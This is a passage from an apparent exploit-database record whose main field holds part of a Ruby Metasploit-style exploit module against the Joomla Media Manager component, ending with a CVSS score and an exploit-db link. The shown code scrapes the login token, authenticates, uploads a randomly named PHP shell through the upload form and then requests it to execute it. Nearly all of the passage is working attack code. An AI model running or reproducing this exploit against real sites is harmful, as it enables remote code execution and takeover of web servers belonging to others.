get_login_form\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\r\n 'cookie' => @cookies,\r\n 'vars_get' => {\r\n 'view' => 'login'\r\n }\r\n })\r\n\r\n return res\r\n\r\n end\r\n\r\n def login\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\r\n 'cookie' => @cookies,\r\n 'vars_get' => {\r\n 'task' => 'user.login'\r\n },\r\n 'vars_post' => {\r\n 'username' => @username,\r\n 'password' => @password\r\n 
}.merge(@login_options)\r\n })\r\n\r\n return res\r\n end\r\n\r\n def parse_login_options(html)\r\n html.scan(/<input type=\"hidden\" name=\"(.*)\" value=\"(.*)\" \\/>/) {|option|\r\n @login_options[option[0]] = option[1] if option[1] == \"1\" # Searching for the Token Parameter, which always has value \"1\"\r\n }\r\n end\r\n\r\n def exploit\r\n @login_options = {}\r\n @cookies = \"\"\r\n @upload_name = \"#{rand_text_alpha(rand(5) + 3)}.php\"\r\n @username = datastore['USERNAME']\r\n @password = datastore['PASSWORD']\r\n\r\n print_status(\"#{peer} - Checking Access to Media Component...\")\r\n res = get_upload_form\r\n\r\n if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/\r\n print_status(\"#{peer} - Authentication required... Proceeding...\")\r\n\r\n if @username.empty? or @password.empty?\r\n fail_with(Exploit::Failure::BadConfig, \"#{peer} - Authentication is required to access the Media Manager Component, please provide credentials\")\r\n end\r\n @cookies = res.get_cookies.sub(/;$/, \"\")\r\n\r\n print_status(\"#{peer} - Accessing the Login Form...\")\r\n res = get_login_form\r\n if res.nil? or res.code != 200 or res.body !~ /login/\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - Unable to Access the Login Form\")\r\n end\r\n parse_login_options(res.body)\r\n\r\n res = login\r\n if not res or res.code != 303\r\n fail_with(Exploit::Failure::NoAccess, \"#{peer} - Unable to Authenticate\")\r\n end\r\n elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\r\n print_status(\"#{peer} - Authentication isn't required.... 
Proceeding...\")\r\n @cookies = res.get_cookies.sub(/;$/, \"\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Failed to Access the Media Manager Component\")\r\n end\r\n\r\n print_status(\"#{peer} - Accessing the Upload Form...\")\r\n res = get_upload_form\r\n\r\n if res and res.code == 200 and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\r\n upload_uri = Rex::Text.html_decode($1)\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - Unable to Access the Upload Form\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading shell...\")\r\n\r\n res = upload(upload_uri)\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - Upload failed\")\r\n end\r\n\r\n register_files_for_cleanup(\"#{@upload_name}.\")\r\n print_status(\"#{peer} - Executing shell...\")\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"images\", @upload_name),\r\n })\r\n\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27610/"}]}